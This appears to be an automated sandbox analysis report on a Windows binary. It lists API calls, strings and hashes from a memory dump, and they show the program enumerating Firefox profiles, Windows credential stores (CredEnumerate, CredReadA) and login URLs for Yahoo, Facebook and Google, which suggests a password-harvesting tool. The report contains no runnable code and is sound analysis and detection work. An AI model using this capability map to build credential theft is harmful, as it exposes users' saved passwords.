                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00453928), ref: 0040EE56
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,00453928), ref: 0040EE66
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040EE6D
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040EE7B
                                                                                                                                                                  • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040EEC8
                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040EF02
                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040EF15
                                                                                                                                                                    • Part of subcall function 00403D7A: wcslen.MSVCRT ref: 00403D97
                                                                                                                                                                    • Part of subcall function 00403D7A: SendMessageW.USER32(?,00001061,?,?), ref: 00403DBB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$SendWindow$Createwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterShowStatusTempToolbarmemcpy
                                                                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                  • API String ID: 1225797202-2103577948
                                                                                                                                                                  • Opcode ID: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
                                                                                                                                                                  • Instruction ID: 8c9b3575536fccf7ef0877cb0e8d9f23cb5666ec72f10922821c14b88f39767b
                                                                                                                                                                  • Opcode Fuzzy Hash: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
                                                                                                                                                                  • Instruction Fuzzy Hash: B5B1A271540388AFEF11DF64CC89BCA7FA5AF55304F0404BAFA48AF292C7B99544CB69
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0B9
  • Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0CE
  • Part of subcall function 0040E076: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
  • Part of subcall function 0040E076: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
  • Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
  • Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
  • Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
  • Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
  • Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
  • Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
  • Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E19F
  • Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
  • Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E1BC
  • Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
  • Part of subcall function 0040E076: GetSysColor.USER32(0000000F), ref: 0040E1D5
• GetModuleHandleW.KERNEL32(00000000), ref: 0040377A
• LoadIconW.USER32 ref: 00403785
• ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403796
• GetModuleHandleW.KERNEL32(00000000), ref: 0040379A
• LoadIconW.USER32 ref: 0040379F
• ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 004037AA
• GetModuleHandleW.KERNEL32(00000000), ref: 004037AE
• LoadIconW.USER32 ref: 004037B3
• ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 004037BE
• GetModuleHandleW.KERNEL32(00000000), ref: 004037C2
• LoadIconW.USER32 ref: 004037C7
• ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 004037D2
• GetModuleHandleW.KERNEL32(00000000), ref: 004037D6
• LoadIconW.USER32 ref: 004037DB
• ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 004037E6
• GetModuleHandleW.KERNEL32(00000000), ref: 004037EA
• LoadIconW.USER32 ref: 004037EF
• ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 004037FA
• GetModuleHandleW.KERNEL32(00000000), ref: 004037FE
• LoadIconW.USER32 ref: 00403803
• ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 0040380E
• GetModuleHandleW.KERNEL32(00000000), ref: 00403812
• LoadIconW.USER32 ref: 00403817
• ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 00403822
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: IconImage$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 715923342-0
Uniqueness Score: -1.00%

APIs
• GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
• ??2@YAPAXI@Z.MSVCRT ref: 00443D51
• GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
• VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
• VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
• _snwprintf.MSVCRT ref: 00443DD1
• wcscpy.MSVCRT ref: 00443DFB
• ??3@YAXPAX@Z.MSVCRT ref: 00443EAB
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 1223191525-1542517562
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040E0B9
• memset.MSVCRT ref: 0040E0CE
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E117
• ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E122
• SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
• ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
• ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
• SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
• GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
• LoadImageW.USER32 ref: 0040E19F
• GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
• LoadImageW.USER32 ref: 0040E1BC
• ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
• GetSysColor.USER32(0000000F), ref: 0040E1D5
• ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040E1F0
• ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040E200
• DeleteObject.GDI32(?), ref: 0040E20C
• DeleteObject.GDI32(?), ref: 0040E212
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040E22F
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 304928396-0
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00406B72
  • Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
• _wcsnicmp.MSVCRT ref: 00406BE5
• memset.MSVCRT ref: 00406C09
• memset.MSVCRT ref: 00406C25
• _snwprintf.MSVCRT ref: 00406C45
• wcsrchr.MSVCRT ref: 00406C6C
• CompareFileTime.KERNEL32(?,?,00000000), ref: 00406C9F
• wcscpy.MSVCRT ref: 00406CC1
• memset.MSVCRT ref: 00406BBF
  • Part of subcall function 00413EE6: RegEnumKeyExW.ADVAPI32 ref: 00413F09
• RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
• wcscpy.MSVCRT ref: 00406D07
• ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
• String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
• API String ID: 1094916163-2797892316
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
                                                                                                                                                                  • Opcode ID: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
                                                                                                                                                                  • Instruction ID: 7b6d47d0ae84673c1440bb3f6a45a38d491a9b2de853a8b7013f3412f20213e7
                                                                                                                                                                  • Opcode Fuzzy Hash: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
                                                                                                                                                                  • Instruction Fuzzy Hash: FC31B9B6504305BAF720EA55DD86EAB73BCDBC1714F20406FF214B2182EB7C99858A5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                  • API String ID: 667068680-2887671607
                                                                                                                                                                  • Opcode ID: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
                                                                                                                                                                  • Instruction ID: 49f1c8a85f5507baf9409120c02bba5f1b3352987f0cf3d6caa0177263683d24
                                                                                                                                                                  • Opcode Fuzzy Hash: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01C8F5D80314BADB216FB1AC8AA053EA5F71C7D3710883BE42452272D778C610CE9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                  • API String ID: 1607361635-601624466
                                                                                                                                                                  • Opcode ID: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
                                                                                                                                                                  • Instruction ID: 86ecdfe433e0374b5ced7b433421c6295f8700cac4d68a1fbb2313435c6baabf
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6561A171900208EFEF14EF94CC85EAE7B79EF45314F1001AAF815A72D2DB38AA55CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                                                  • Opcode ID: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
                                                                                                                                                                  • Instruction ID: d19b445dff31b0d86a25f5297df5c333c47444227bfe33656549cbc54b746d40
                                                                                                                                                                  • Opcode Fuzzy Hash: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D4142B1D40219AAEB20EF95CC85FFB737CFF45304F4540ABB918A2191E7389A948F65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040BD76
                                                                                                                                                                  • memset.MSVCRT ref: 0040BD92
                                                                                                                                                                    • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                    • Part of subcall function 00443D20: GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
                                                                                                                                                                    • Part of subcall function 00443D20: ??2@YAPAXI@Z.MSVCRT ref: 00443D51
                                                                                                                                                                    • Part of subcall function 00443D20: GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
                                                                                                                                                                    • Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
                                                                                                                                                                    • Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
                                                                                                                                                                    • Part of subcall function 00443D20: _snwprintf.MSVCRT ref: 00443DD1
                                                                                                                                                                    • Part of subcall function 00443D20: wcscpy.MSVCRT ref: 00443DFB
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BDD6
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BDE5
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BDF5
                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(0040BEF4,00000004,0040BB24,00000000), ref: 0040BE5A
                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(0040BEF4,00000005,0040BB24,00000000), ref: 0040BE64
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BE6C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                  • API String ID: 3037099051-517860148
                                                                                                                                                                  • Opcode ID: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
                                                                                                                                                                  • Instruction ID: d02a95b1ac945ad733c6c475c60bd1556454897fd3a1253caa6bc47d13ece21f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
                                                                                                                                                                  • Instruction Fuzzy Hash: AD21A9B294021876EB20BB529C46FCB7B6CDF55754F00047BF50871192DBBC9A94C6EE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                                                                                                                                                  • API String ID: 2238633743-1621422469
                                                                                                                                                                  • Opcode ID: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
                                                                                                                                                                  • Instruction ID: d7a6577b60cfc464e8e16958ee64dd601e1a2e2a5708563609cb1b578f097ad1
                                                                                                                                                                  • Opcode Fuzzy Hash: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
                                                                                                                                                                  • Instruction Fuzzy Hash: A2F0F974940B44AFEF306F769D49E06BEF0EFA87017214D2EE0C1A3651D7B99100CE48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00407C89,?,?,?,0000001E), ref: 00407760
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00407774
                                                                                                                                                                    • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                  • memset.MSVCRT ref: 004077A6
                                                                                                                                                                  • memset.MSVCRT ref: 004077C8
                                                                                                                                                                  • memset.MSVCRT ref: 004077DD
                                                                                                                                                                  • strcmp.MSVCRT ref: 0040781C
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078B2
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078D1
                                                                                                                                                                  • memset.MSVCRT ref: 004078E5
                                                                                                                                                                  • strcmp.MSVCRT ref: 00407949
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040797B
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00407C89,?,?,?,0000001E), ref: 00407984
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$File$strcmpstrcpy$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                  • String ID: ---
                                                                                                                                                                  • API String ID: 3751793120-2854292027
                                                                                                                                                                  • Opcode ID: 2a857cbeb5ab5e1bd89b1bc0351e99f96f5a4f3ec23066d0f11bd49c9005f69b
                                                                                                                                                                  • Instruction ID: 5eab4b77d8efc932d29ad1d752f1a4839dd8d7bf75d011c8978729a0abaaed7e
                                                                                                                                                                  • Opcode Fuzzy Hash: 2a857cbeb5ab5e1bd89b1bc0351e99f96f5a4f3ec23066d0f11bd49c9005f69b
                                                                                                                                                                  • Instruction Fuzzy Hash: 856159B2C0416D9ADF20EB948C859DEBB7C9B15314F1041FBE518B3141DA385FC4CBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(psapi.dll,?,00411582), ref: 00412FAC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412FC5
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412FD6
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00412FE7
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00412FF8
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413009
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413029
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                  • API String ID: 2449869053-70141382
                                                                                                                                                                  • Opcode ID: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
                                                                                                                                                                  • Instruction ID: 777907c91c3138f07d32b7effc6a6e277a0cb3bdfe1d402d2202e46302417196
                                                                                                                                                                  • Opcode Fuzzy Hash: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
                                                                                                                                                                  • Instruction Fuzzy Hash: B5014030940715AAD7318F256E44B6A2EE4E759B83B14002BA404D2A5AEBB8D941DBAC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                                                                                  • Opcode ID: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
                                                                                                                                                                  • Instruction ID: 6ae1867121f1a9de607d4cf96a2848453b881622ab493d5bc2878352e6736150
                                                                                                                                                                  • Opcode Fuzzy Hash: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
                                                                                                                                                                  • Instruction Fuzzy Hash: 4D01EC6328A32164F97469A7AC07F8B0A49CBD2F7AF71543BF904D41C6FF8D944560AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00411589), ref: 00412F24
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00412F3D
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00412F4E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00412F5F
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00412F70
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00412F81
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                                                                  • Opcode ID: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
                                                                                                                                                                  • Instruction ID: 90193f1111e05c4afbc6439255eabbfb584b4719c6c3eda45dffcf0f008ca331
                                                                                                                                                                  • Opcode Fuzzy Hash: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BF08B30941321AEAB208F295F40F6729B4E745BCAF140037B404D1655DBE8C453DF7D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403BA4: FreeLibrary.KERNEL32(?,00403B31,00000000,00409589,?,00000000,?), ref: 00403BAB
                                                                                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                  • API String ID: 2449869053-4258758744
                                                                                                                                                                  • Opcode ID: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
                                                                                                                                                                  • Instruction ID: 8f7743962e36341c748a679f4d1b70e48ab6ec882cd35c5a4d1c5c737e04e9f5
                                                                                                                                                                  • Opcode Fuzzy Hash: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F011A34500B419BDB31AF768809E0ABBF4EF94709B20882FE091A3692D6BDB140CF48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040FA22
                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040FA30
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040FA45
                                                                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040FA79
